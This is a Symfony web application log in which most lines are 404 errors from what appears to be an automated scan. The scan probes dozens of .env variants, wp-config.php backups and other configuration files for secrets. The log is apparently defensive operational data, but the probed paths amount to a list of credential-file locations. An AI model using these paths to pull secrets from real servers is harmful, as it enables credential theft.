[2025-12-20 20:40:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /tsconfig.spec.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /tsconfig.spec.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:41:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /utils/awsS3.util.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /utils/awsS3.util.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:41:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /utils/s3Client.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /utils/s3Client.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:42:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-config.php.bak"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-config.php.bak\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:42:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-config.php.old"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-config.php.old\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:42:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp_mail_smtp.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp_mail_smtp.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:43:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b5b8fb","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b5b8fb","method":"GET"} []
[2025-12-20 20:43:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 20:43:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.docker/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.docker/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:43:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.docker/laravel/app/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.docker/laravel/app/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:43:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:43:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env-example"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env-example\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:43:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env-sample"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env-sample\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:43:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.backup"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.backup\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:43:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.bak"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.bak\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:43:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.config"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.config\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:43:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.dev"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.dev\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:44:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.development"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.development\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:44:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.development.local"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.development.local\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:44:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.development.sample"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.development.sample\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:44:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.dist"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.dist\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:44:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.docker"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.docker\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.docker.dev"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.docker.dev\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.example"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.example\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:44:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.int"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.int\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:44:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.live"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.live\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:44:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.local"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.local\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:44:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.local.dist"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.local.dist\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:45:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.old"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.old\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:45:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.prod"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.prod\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:45:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.prod.local"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.prod.local\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:45:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.production"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.production\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:45:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.production.local"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.production.local\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:45:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.project"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.project\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:45:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.qa"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.qa\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:45:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.sample"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.sample\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:45:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.save"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.save\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:45:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.stage"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.stage\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:45:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.staging"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.staging\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:45:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.travis"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.travis\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:45:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.uat"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.uat\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:45:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7102de","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7102de","method":"GET"} []
[2025-12-20 20:45:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 20:46:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.webpack"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.webpack\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:46:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env_1"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env_1\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:46:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.envrc"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.envrc\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
